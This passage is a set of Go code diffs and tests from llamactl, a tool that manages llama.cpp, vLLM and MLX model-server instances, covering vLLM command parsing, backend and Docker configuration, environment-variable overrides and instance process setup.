DisableSlidingWindowMask bool `json:"disable_sliding_window_mask,omitempty"`
EnableTRTLLMEngineLatency bool `json:"enable_trtllm_engine_latency,omitempty"`
OverridePoolingConfig string `json:"override_pooling_config,omitempty"`
OverrideNeuronConfig string `json:"override_neuron_config,omitempty"`
OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"`
}
// BuildCommandArgs converts VllmServerOptions to command line arguments
// For vLLM native, model is a positional argument after "serve"
func (o *VllmServerOptions) BuildCommandArgs() []string {
var args []string
// Add model as positional argument if specified (for native execution)
if o.Model != "" {
args = append(args, o.Model)
}
// Create a copy without Model field to avoid --model flag
optionsCopy := *o
optionsCopy.Model = ""
// Use package-level multipleFlags variable
flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
args = append(args, flagArgs...)
return args
}
func (o *VllmServerOptions) BuildDockerArgs() []string {
var args []string
// Use package-level multipleFlags variable
flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
args = append(args, flagArgs...)
return args
}
// ParseVllmCommand parses a vLLM serve command string into VllmServerOptions
// Supports multiple formats:
// 1. Full command: "vllm serve --model MODEL_NAME --other-args"
// 2. Full path: "/usr/local/bin/vllm serve --model MODEL_NAME"
// 3. Serve only: "serve --model MODEL_NAME --other-args"
// 4. Args only: "--model MODEL_NAME --other-args"
// 5. Multiline commands with backslashes
func ParseVllmCommand(command string) (*VllmServerOptions, error) {
executableNames := []string{"vllm"}
subcommandNames := []string{"serve"}
multiValuedFlags := map[string]bool{
"middleware": true,
"api_key": true,
"allowed_origins": true,
"allowed_methods": true,
"allowed_headers": true,
"lora_modules": true,
"prompt_adapters": true,
}
var vllmOptions VllmServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
return nil, err
}
return &vllmOptions, nil
}

View File

@@ -0,0 +1,153 @@
package vllm_test
import (
"llamactl/pkg/backends/vllm"
"slices"
"testing"
)
func TestParseVllmCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic vllm serve command",
command: "vllm serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "serve only command",
command: "serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "positional model with flags",
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
expectErr: false,
},
{
name: "model with path",
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `vllm serve "unterminated`,
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := vllm.ParseVllmCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseVllmCommandValues(t *testing.T) {
command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
result, err := vllm.ParseVllmCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "test-model" {
t.Errorf("expected model 'test-model', got '%s'", result.Model)
}
if result.TensorParallelSize != 4 {
t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize)
}
if result.GPUMemoryUtilization != 0.8 {
t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization)
}
if !result.EnableLogOutputs {
t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := vllm.VllmServerOptions{
Model: "microsoft/DialoGPT-medium",
Port: 8080,
Host: "localhost",
TensorParallelSize: 2,
GPUMemoryUtilization: 0.8,
EnableLogOutputs: true,
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
}
args := options.BuildCommandArgs()
// Check that model is the first positional argument (not a --model flag)
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
}
// Check that --model flag is NOT present (since model should be positional)
if contains(args, "--model") {
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
}
// Check other flags
if !containsFlagWithValue(args, "--tensor-parallel-size", "2") {
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
}
if !contains(args, "--enable-log-outputs") {
t.Errorf("Expected --enable-log-outputs not found in %v", args)
}
if !contains(args, "--host") {
t.Errorf("Expected --host not found in %v", args)
}
if !contains(args, "--port") {
t.Errorf("Expected --port not found in %v", args)
}
// Check array handling (multiple flags)
allowedOriginsCount := 0
for i := range args {
if args[i] == "--allowed-origins" {
allowedOriginsCount++
}
}
if allowedOriginsCount != 2 {
t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)
}
func containsFlagWithValue(args []string, flag, value string) bool {
for i, arg := range args {
if arg == flag && i+1 < len(args) && args[i+1] == value {
return true
}
}
return false
}

View File

@@ -1,6 +1,7 @@
package config
import (
"log"
"os"
"path/filepath"
"runtime"
@@ -10,9 +11,33 @@ import (
"gopkg.in/yaml.v3"
)
// BackendSettings contains structured backend configuration
type BackendSettings struct {
Command string `yaml:"command"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
Docker *DockerSettings `yaml:"docker,omitempty"`
}
// DockerSettings contains Docker-specific configuration
type DockerSettings struct {
Enabled bool `yaml:"enabled"`
Image string `yaml:"image"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
}
// BackendConfig contains backend executable configurations
type BackendConfig struct {
LlamaCpp BackendSettings `yaml:"llama-cpp"`
VLLM BackendSettings `yaml:"vllm"`
MLX BackendSettings `yaml:"mlx"`
}
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Backends BackendConfig `yaml:"backends"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
@@ -55,8 +80,11 @@ type InstancesConfig struct {
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"`
// Maximum number of instances that can be running at the same time
MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
// Enable LRU eviction for instance logs
EnableLRUEviction bool `yaml:"enable_lru_eviction"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
@@ -106,14 +134,50 @@ func LoadConfig(configPath string) (AppConfig, error) {
AllowedOrigins: []string{"*"}, // Default to allow all origins
EnableSwagger: false,
},
Backends: BackendConfig{
LlamaCpp: BackendSettings{
Command: "llama-server",
Args: []string{},
Environment: map[string]string{},
Docker: &DockerSettings{
Enabled: false,
Image: "ghcr.io/ggml-org/llama.cpp:server",
Args: []string{
"run", "--rm", "--network", "host", "--gpus", "all",
"-v", filepath.Join(getDefaultDataDirectory(), "llama.cpp") + ":/root/.cache/llama.cpp"},
Environment: map[string]string{},
},
},
VLLM: BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Docker: &DockerSettings{
Enabled: false,
Image: "vllm/vllm-openai:latest",
Args: []string{
"run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g",
"-v", filepath.Join(getDefaultDataDirectory(), "huggingface") + ":/root/.cache/huggingface",
},
Environment: map[string]string{},
},
},
MLX: BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
// No Docker section for MLX - not supported
},
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
DataDir: getDefaultDataDirectory(),
InstancesDir: filepath.Join(getDefaultDataDirectory(), "instances"),
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
PortRange: [2]int{8000, 9000},
DataDir: getDefaultDataDirectory(),
// NOTE: empty strings are set as placeholder values since InstancesDir and LogsDir
// should be relative path to DataDir if not explicitly set.
InstancesDir: "",
LogsDir: "",
AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited
LlamaExecutable: "llama-server",
MaxRunningInstances: -1, // -1 means unlimited
EnableLRUEviction: true,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
@@ -137,6 +201,14 @@ func LoadConfig(configPath string) (AppConfig, error) {
// 3. Override with environment variables
loadEnvVars(&cfg)
// If InstancesDir or LogsDir is not set, set it to relative path of DataDir
if cfg.Instances.InstancesDir == "" {
cfg.Instances.InstancesDir = filepath.Join(cfg.Instances.DataDir, "instances")
}
if cfg.Instances.LogsDir == "" {
cfg.Instances.LogsDir = filepath.Join(cfg.Instances.DataDir, "logs")
}
return cfg, nil
}
@@ -157,6 +229,7 @@ func loadConfigFile(cfg *AppConfig, configPath string) error {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
log.Printf("Read config at %s", path)
return nil
}
}
@@ -211,9 +284,118 @@ func loadEnvVars(cfg *AppConfig) {
cfg.Instances.MaxInstances = m
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec
if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
if m, err := strconv.Atoi(maxRunning); err == nil {
cfg.Instances.MaxRunningInstances = m
}
}
if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
cfg.Instances.EnableLRUEviction = b
}
}
// Backend config
// LlamaCpp backend
if llamaCmd := os.Getenv("LLAMACTL_LLAMACPP_COMMAND"); llamaCmd != "" {
cfg.Backends.LlamaCpp.Command = llamaCmd
}
if llamaArgs := os.Getenv("LLAMACTL_LLAMACPP_ARGS"); llamaArgs != "" {
cfg.Backends.LlamaCpp.Args = strings.Split(llamaArgs, " ")
}
if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_ENV"); llamaEnv != "" {
if cfg.Backends.LlamaCpp.Environment == nil {
cfg.Backends.LlamaCpp.Environment = make(map[string]string)
}
parseEnvVars(llamaEnv, cfg.Backends.LlamaCpp.Environment)
}
if llamaDockerEnabled := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENABLED"); llamaDockerEnabled != "" {
if b, err := strconv.ParseBool(llamaDockerEnabled); err == nil {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Enabled = b
}
}
if llamaDockerImage := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_IMAGE"); llamaDockerImage != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Image = llamaDockerImage
}
if llamaDockerArgs := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ARGS"); llamaDockerArgs != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Args = strings.Split(llamaDockerArgs, " ")
}
if llamaDockerEnv := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENV"); llamaDockerEnv != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
if cfg.Backends.LlamaCpp.Docker.Environment == nil {
cfg.Backends.LlamaCpp.Docker.Environment = make(map[string]string)
}
parseEnvVars(llamaDockerEnv, cfg.Backends.LlamaCpp.Docker.Environment)
}
// vLLM backend
if vllmCmd := os.Getenv("LLAMACTL_VLLM_COMMAND"); vllmCmd != "" {
cfg.Backends.VLLM.Command = vllmCmd
}
if vllmArgs := os.Getenv("LLAMACTL_VLLM_ARGS"); vllmArgs != "" {
cfg.Backends.VLLM.Args = strings.Split(vllmArgs, " ")
}
if vllmEnv := os.Getenv("LLAMACTL_VLLM_ENV"); vllmEnv != "" {
if cfg.Backends.VLLM.Environment == nil {
cfg.Backends.VLLM.Environment = make(map[string]string)
}
parseEnvVars(vllmEnv, cfg.Backends.VLLM.Environment)
}
if vllmDockerEnabled := os.Getenv("LLAMACTL_VLLM_DOCKER_ENABLED"); vllmDockerEnabled != "" {
if b, err := strconv.ParseBool(vllmDockerEnabled); err == nil {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Enabled = b
}
}
if vllmDockerImage := os.Getenv("LLAMACTL_VLLM_DOCKER_IMAGE"); vllmDockerImage != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Image = vllmDockerImage
}
if vllmDockerArgs := os.Getenv("LLAMACTL_VLLM_DOCKER_ARGS"); vllmDockerArgs != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Args = strings.Split(vllmDockerArgs, " ")
}
if vllmDockerEnv := os.Getenv("LLAMACTL_VLLM_DOCKER_ENV"); vllmDockerEnv != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
if cfg.Backends.VLLM.Docker.Environment == nil {
cfg.Backends.VLLM.Docker.Environment = make(map[string]string)
}
parseEnvVars(vllmDockerEnv, cfg.Backends.VLLM.Docker.Environment)
}
// MLX backend
if mlxCmd := os.Getenv("LLAMACTL_MLX_COMMAND"); mlxCmd != "" {
cfg.Backends.MLX.Command = mlxCmd
}
if mlxArgs := os.Getenv("LLAMACTL_MLX_ARGS"); mlxArgs != "" {
cfg.Backends.MLX.Args = strings.Split(mlxArgs, " ")
}
if mlxEnv := os.Getenv("LLAMACTL_MLX_ENV"); mlxEnv != "" {
if cfg.Backends.MLX.Environment == nil {
cfg.Backends.MLX.Environment = make(map[string]string)
}
parseEnvVars(mlxEnv, cfg.Backends.MLX.Environment)
}
// Instance defaults
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
@@ -286,6 +468,19 @@ func ParsePortRange(s string) [2]int {
return [2]int{0, 0} // Invalid format
}
// parseEnvVars parses environment variables in format "KEY1=value1,KEY2=value2"
// and populates the provided environment map
func parseEnvVars(envString string, envMap map[string]string) {
if envString == "" {
return
}
for _, envPair := range strings.Split(envString, ",") {
if parts := strings.SplitN(strings.TrimSpace(envPair), "=", 2); len(parts) == 2 {
envMap[parts[0]] = parts[1]
}
}
}
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
@@ -318,6 +513,10 @@ func getDefaultDataDirectory() string {
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Use ./llamactl.yaml and ./config.yaml as the default config file
locations = append(locations, "llamactl.yaml")
locations = append(locations, "config.yaml")
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
@@ -347,3 +546,17 @@ func getDefaultConfigLocations() []string {
return locations
}
// GetBackendSettings resolves backend settings
func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings {
switch backendType {
case "llama-cpp":
return bc.LlamaCpp
case "vllm":
return bc.VLLM
case "mlx":
return bc.MLX
default:
return BackendSettings{}
}
}

View File

@@ -42,9 +42,6 @@ func TestLoadConfig_Defaults(t *testing.T) {
if cfg.Instances.MaxInstances != -1 {
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "llama-server" {
t.Errorf("Expected default executable 'llama-server', got %q", cfg.Instances.LlamaExecutable)
}
if !cfg.Instances.DefaultAutoRestart {
t.Error("Expected default auto restart to be true")
}
@@ -101,9 +98,6 @@ instances:
if cfg.Instances.MaxInstances != 5 {
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "/usr/bin/llama-server" {
t.Errorf("Expected executable '/usr/bin/llama-server', got %q", cfg.Instances.LlamaExecutable)
}
if cfg.Instances.DefaultAutoRestart {
t.Error("Expected auto restart to be false")
}
@@ -123,7 +117,6 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
"LLAMACTL_LOGS_DIR": "/env/logs",
"LLAMACTL_MAX_INSTANCES": "20",
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
"LLAMACTL_DEFAULT_MAX_RESTARTS": "7",
"LLAMACTL_DEFAULT_RESTART_DELAY": "15",
@@ -156,8 +149,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
if cfg.Instances.MaxInstances != 20 {
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "/env/llama-server" {
t.Errorf("Expected executable '/env/llama-server', got %q", cfg.Instances.LlamaExecutable)
if cfg.Backends.LlamaCpp.Command != "llama-server" {
t.Errorf("Expected default llama command 'llama-server', got %q", cfg.Backends.LlamaCpp.Command)
}
if cfg.Instances.DefaultAutoRestart {
t.Error("Expected auto restart to be false")
@@ -355,3 +348,165 @@ server:
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
}
func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "custom-llama",
Args: []string{"--verbose"},
Docker: &config.DockerSettings{
Enabled: true,
Image: "custom-llama:latest",
Args: []string{"--gpus", "all"},
Environment: map[string]string{"CUDA_VISIBLE_DEVICES": "1"},
},
},
VLLM: config.BackendSettings{
Command: "custom-vllm",
Args: []string{"serve", "--debug"},
},
MLX: config.BackendSettings{
Command: "custom-mlx",
Args: []string{},
},
}
// Test llama-cpp with Docker
settings := bc.GetBackendSettings("llama-cpp")
if settings.Command != "custom-llama" {
t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
}
if len(settings.Args) != 1 || settings.Args[0] != "--verbose" {
t.Errorf("Expected args ['--verbose'], got %v", settings.Args)
}
if settings.Docker == nil || !settings.Docker.Enabled {
t.Error("Expected Docker to be enabled")
}
if settings.Docker.Image != "custom-llama:latest" {
t.Errorf("Expected Docker image 'custom-llama:latest', got %q", settings.Docker.Image)
}
// Test vLLM without Docker
settings = bc.GetBackendSettings("vllm")
if settings.Command != "custom-vllm" {
t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
}
if len(settings.Args) != 2 || settings.Args[0] != "serve" || settings.Args[1] != "--debug" {
t.Errorf("Expected args ['serve', '--debug'], got %v", settings.Args)
}
if settings.Docker != nil && settings.Docker.Enabled {
t.Error("Expected Docker to be disabled or nil")
}
// Test MLX
settings = bc.GetBackendSettings("mlx")
if settings.Command != "custom-mlx" {
t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
}
}
func TestGetBackendSettings_EmptyConfig(t *testing.T) {
bc := &config.BackendConfig{}
// Test empty llama-cpp
settings := bc.GetBackendSettings("llama-cpp")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty vLLM
settings = bc.GetBackendSettings("vllm")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty MLX
settings = bc.GetBackendSettings("mlx")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
}
func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
// Test that backend environment variables work correctly
envVars := map[string]string{
"LLAMACTL_LLAMACPP_COMMAND": "env-llama",
"LLAMACTL_LLAMACPP_ARGS": "--verbose --threads 4",
"LLAMACTL_LLAMACPP_DOCKER_ENABLED": "true",
"LLAMACTL_LLAMACPP_DOCKER_IMAGE": "env-llama:latest",
"LLAMACTL_LLAMACPP_DOCKER_ARGS": "run --rm --network host --gpus all",
"LLAMACTL_LLAMACPP_DOCKER_ENV": "CUDA_VISIBLE_DEVICES=0,OMP_NUM_THREADS=4",
"LLAMACTL_VLLM_COMMAND": "env-vllm",
"LLAMACTL_VLLM_DOCKER_ENABLED": "false",
"LLAMACTL_VLLM_DOCKER_IMAGE": "env-vllm:latest",
"LLAMACTL_VLLM_DOCKER_ENV": "PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512,CUDA_VISIBLE_DEVICES=1",
"LLAMACTL_MLX_COMMAND": "env-mlx",
}
// Set env vars and ensure cleanup
for key, value := range envVars {
os.Setenv(key, value)
defer os.Unsetenv(key)
}
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
// Verify llama-cpp environment overrides
if cfg.Backends.LlamaCpp.Command != "env-llama" {
t.Errorf("Expected llama command 'env-llama', got %q", cfg.Backends.LlamaCpp.Command)
}
expectedArgs := []string{"--verbose", "--threads", "4"}
if len(cfg.Backends.LlamaCpp.Args) != len(expectedArgs) {
t.Errorf("Expected llama args %v, got %v", expectedArgs, cfg.Backends.LlamaCpp.Args)
}
if !cfg.Backends.LlamaCpp.Docker.Enabled {
t.Error("Expected llama Docker to be enabled")
}
if cfg.Backends.LlamaCpp.Docker.Image != "env-llama:latest" {
t.Errorf("Expected llama Docker image 'env-llama:latest', got %q", cfg.Backends.LlamaCpp.Docker.Image)
}
expectedDockerArgs := []string{"run", "--rm", "--network", "host", "--gpus", "all"}
if len(cfg.Backends.LlamaCpp.Docker.Args) != len(expectedDockerArgs) {
t.Errorf("Expected llama Docker args %v, got %v", expectedDockerArgs, cfg.Backends.LlamaCpp.Docker.Args)
}
if cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"] != "0" {
t.Errorf("Expected CUDA_VISIBLE_DEVICES=0, got %q", cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"])
}
if cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"] != "4" {
t.Errorf("Expected OMP_NUM_THREADS=4, got %q", cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"])
}
// Verify vLLM environment overrides
if cfg.Backends.VLLM.Command != "env-vllm" {
t.Errorf("Expected vLLM command 'env-vllm', got %q", cfg.Backends.VLLM.Command)
}
if cfg.Backends.VLLM.Docker.Enabled {
t.Error("Expected vLLM Docker to be disabled")
}
if cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"] != "max_split_size_mb:512" {
t.Errorf("Expected PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512, got %q", cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"])
}
// Verify MLX environment overrides
if cfg.Backends.MLX.Command != "env-mlx" {
t.Errorf("Expected MLX command 'env-mlx', got %q", cfg.Backends.MLX.Command)
}
}
func TestGetBackendSettings_InvalidBackendType(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
}
// Test invalid backend type returns empty settings
settings := bc.GetBackendSettings("invalid-backend")
if settings.Command != "" {
t.Errorf("Expected empty command for invalid backend, got %q", settings.Command)
}
}

View File

@@ -5,7 +5,7 @@ import (
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends"
"llamactl/pkg/config"
"log"
"net/http"
@@ -29,60 +29,16 @@ func (realTimeProvider) Now() time.Time {
return time.Now()
}
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"`
// LlamaServerOptions contains the options for the llama server
llamacpp.LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON
// which can interfere with proper unmarshaling of the pointer fields
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
OnDemandStart *bool `json:"on_demand_start,omitempty"`
IdleTimeout *int `json:"idle_timeout,omitempty"`
}
var temp tempCreateOptions
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Copy the pointer fields
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
c.OnDemandStart = temp.OnDemandStart
c.IdleTimeout = temp.IdleTimeout
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
return err
}
return nil
}
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *config.InstancesConfig
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalInstanceSettings *config.InstancesConfig
globalBackendSettings *config.BackendConfig
// Status
Running bool `json:"running"`
Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
@@ -109,105 +65,24 @@ type Process struct {
timeProvider TimeProvider `json:"-"` // Time provider for testing
}
// validateAndCopyOptions validates and creates a deep copy of the provided options
// It applies validation rules and returns a safe copy
func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions {
optionsCopy := &CreateInstanceOptions{}
if options != nil {
// Copy the embedded LlamaServerOptions
optionsCopy.LlamaServerOptions = options.LlamaServerOptions
// Copy and validate pointer fields
if options.AutoRestart != nil {
autoRestart := *options.AutoRestart
optionsCopy.AutoRestart = &autoRestart
}
if options.MaxRestarts != nil {
maxRestarts := *options.MaxRestarts
if maxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
maxRestarts = 0
}
optionsCopy.MaxRestarts = &maxRestarts
}
if options.RestartDelay != nil {
restartDelay := *options.RestartDelay
if restartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
restartDelay = 0
}
optionsCopy.RestartDelay = &restartDelay
}
if options.OnDemandStart != nil {
onDemandStart := *options.OnDemandStart
optionsCopy.OnDemandStart = &onDemandStart
}
if options.IdleTimeout != nil {
idleTimeout := *options.IdleTimeout
if idleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, idleTimeout)
idleTimeout = 0
}
optionsCopy.IdleTimeout = &idleTimeout
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
if globalSettings == nil {
return
}
if options.AutoRestart == nil {
defaultAutoRestart := globalSettings.DefaultAutoRestart
options.AutoRestart = &defaultAutoRestart
}
if options.MaxRestarts == nil {
defaultMaxRestarts := globalSettings.DefaultMaxRestarts
options.MaxRestarts = &defaultMaxRestarts
}
if options.RestartDelay == nil {
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
if options.OnDemandStart == nil {
defaultOnDemandStart := globalSettings.DefaultOnDemandStart
options.OnDemandStart = &defaultOnDemandStart
}
if options.IdleTimeout == nil {
defaultIdleTimeout := 0
options.IdleTimeout = &defaultIdleTimeout
}
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process {
func NewInstance(name string, globalBackendSettings *config.BackendConfig, globalInstanceSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// Validate and copy options
optionsCopy := validateAndCopyOptions(name, options)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
options.ValidateAndApplyDefaults(name, globalInstanceSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogsDir)
logger := NewInstanceLogger(name, globalInstanceSettings.LogsDir)
return &Process{
Name: name,
options: optionsCopy,
globalSettings: globalSettings,
logger: logger,
timeProvider: realTimeProvider{},
Created: time.Now().Unix(),
Name: name,
options: options,
globalInstanceSettings: globalInstanceSettings,
globalBackendSettings: globalBackendSettings,
logger: logger,
timeProvider: realTimeProvider{},
Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
}
}
@@ -217,6 +92,50 @@ func (i *Process) GetOptions() *CreateInstanceOptions {
return i.options
}
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Port
}
}
}
return 0
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Host
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
